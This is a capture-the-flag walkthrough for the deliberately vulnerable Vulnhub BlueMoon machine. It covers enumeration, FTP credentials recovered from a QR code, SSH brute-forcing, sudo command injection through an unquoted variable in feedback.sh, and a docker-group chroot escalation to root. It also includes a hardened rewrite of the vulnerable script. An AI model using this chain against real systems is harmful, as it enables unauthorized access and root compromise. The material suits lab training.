Vulnhub-BlueMoon: 2021

Address

https://download.vulnhub.com/bluemoon/bluemoon.ova

[screenshot]

Boot the target machine and scan it first. We find:

[screenshot]

Visit the site and, at the same time, run the following scans:

nmap 10.103.207.184    # port scan
dirsearch -u http://10.103.207.184/
gobuster dir -u http://10.103.207.184/ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -s 200,301,302 --status-codes-blacklist ""
feroxbuster -u http://10.103.207.184/    # enumerate files served on port 80

We find:

http://10.103.207.184/hidden_text

The site has a functional endpoint:

http://10.103.207.184/.QR_C0d3.png

It turns out to be a QR code. I could of course send it to my friends, have them scan it and send the result back to me, but never mind.

https://cli.im/deqr/other

Decoding it with the online QR decoder above gives:

#!/bin/bash
HOST=ip
USER=userftp
PASSWORD=ftpp@ssword
ftp -inv $HOST <<EOF
user $USER $PASSWORD
bye
EOF

This reveals FTP credentials; log in and download the files:

ftp> get  information.txt
local: information.txt remote: information.txt
229 Entering Extended Passive Mode (|||14150|)
150 Opening BINARY mode data connection for information.txt (147 bytes).
100% |*************************************************************************************************| 147 51.82 KiB/s 00:00 ETA
226 Transfer complete.
147 bytes received in 00:00 (44.29 KiB/s)
ftp> get p_lists.txt
local: p_lists.txt remote: p_lists.txt

Even before the download finished, a hint was given, so go straight to brute-forcing.

[screenshot]

With the username and password obtained, connect remotely over SSH:

[screenshot]

Login succeeds; now use sudo to escalate privileges:

robin@BlueMoon:~$ cat /home/robin/project/feedback.sh
#!/bin/bash

clear
echo -e "Script For FeedBack\n"

read -p "Enter Your Name : " name
echo ""
read -p "Enter You FeedBack About This Target Machine : " feedback
echo ""
$feedback 2>/dev/null

echo -e "\nThanks For Your FeedBack...!\n"

Notice that it passes the parameter we control straight into $feedback 2>/dev/null, so we simply give it /bin/bash:

/bin/bash 2>/dev/null    # direct command execution
sudo -u  jerry /home/robin/project/feedback.sh

Running this command,

[screenshot]

we move laterally to another user (well, I suppose that is what you can call it).
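As an added example (not part of the original writeup or the BlueMoon VM), here is the feedback.sh defect isolated next to a hardened version that treats the feedback as data rather than a command; the function names and the log path are my own assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup or the BlueMoon VM.
# feedback.sh expands the user's input unquoted on a line of its own
# ("$feedback 2>/dev/null"), so the shell word-splits it and runs it as a
# command. That is why typing /bin/bash yields a shell as the sudo target user.

# Vulnerable pattern, isolated in a function so it can be compared. The
# argument is executed, exactly as in feedback.sh. Never do this.
unsafe_feedback() {
    $1 2>/dev/null
}

# Hardened pattern: the feedback is data, never a command. It is validated,
# then appended to a log with printf '%s' so no expansion or execution occurs.
# Prints the recorded line. The default log path is hypothetical; pass your own as $3.
safe_feedback() {
    name=$1
    feedback=$2
    log=${3:-/tmp/feedback.log}
    # Reject control characters and newlines so a single submission cannot
    # forge extra log records.
    case $feedback in
        *[![:print:]]*)
            echo "rejected: non-printable characters in feedback" >&2
            return 1 ;;
    esac
    printf '%s\t%s\n' "$name" "$feedback" >> "$log"
    printf '%s\t%s\n' "$name" "$feedback"
}

# Demonstration: the same string is handled completely differently.
unsafe_feedback 'echo this-was-executed'        # runs the input as a command
safe_feedback   robin 'echo this-was-executed'  # records the input as text
```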

/usr/bin/script -qc /bin/bash /dev/null    # stabilise the shell

What do we find? The user's groups include docker, so try escalating privileges through docker:

https://gtfobins.org/
docker run -v /:/mnt --rm -it alpine chroot /mnt sh    # no sudo prepended, since there is no s (setuid) permission

[screenshot]

Root obtained.